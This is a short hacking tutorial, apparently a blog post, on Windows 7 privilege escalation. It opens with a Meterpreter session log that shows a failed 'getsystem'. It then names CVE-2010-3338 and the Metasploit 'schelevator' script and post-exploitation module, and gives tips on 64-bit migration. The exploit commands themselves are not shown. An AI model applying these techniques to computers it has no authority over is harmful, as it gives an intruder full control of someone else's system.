[*] Meterpreter session 1 opened (172.16.16.2:443 -> 172.16.16.15:49157) at 2011-04-07 15:35:40 +0700
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: ian-PC\ian
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >

When the privilege escalation is attempted, Windows refuses it.

Privilege Escalation By Example

Dear all,

Straight to the point..
When we manage to take over a computer, the access rights we obtain are sometimes limited: we cannot modify files or change the configuration on the target. For that, higher access rights are needed, and this technique is known as privilege escalation..
On computers running Windows XP or Server 2003, privilege escalation is easier because the protection is not very elaborate. It is a different matter on a system running Windows 7 or Windows Server 2008, all the more so on the x64 architecture; there privilege escalation is a bit harder, because the protection built into these newer Windows operating systems is very good. That protection includes User Account Control (UAC).
Privilege escalation is still possible, though, for example by:
1. exploiting an existing security hole (PART 1)
2. bypassing UAC (PART 2)
3. exploiting an insecure program installation, for example privilege escalation via a user defined function (MySQL UDF) on a MySQL server (PART 3)

This first part explains privilege escalation by making use of a security hole in Windows 7. The identifier of that hole is CVE-2010-3338.
This hole was used by the Stuxnet malware for privilege escalation.
One of the Metasploit staff (jduck) ported the technique into Metasploit, as a Meterpreter script (schelevator) and as a post-exploitation module (post/escalate/ms10_092_schelevator.rb).
So there are two ways to run it: with the Meterpreter script, or with the post-exploitation module..

Tip: if the system being exploited is 64-bit while the payload is a 32-bit Meterpreter, use the migrate command to move into a 64-bit process, or use a 64-bit Meterpreter instead..

In this example I exploited Windows 7 x64 using a 64-bit Meterpreter...

Enjoy, and happy hacking

— ian hrm a.k.a laharisi —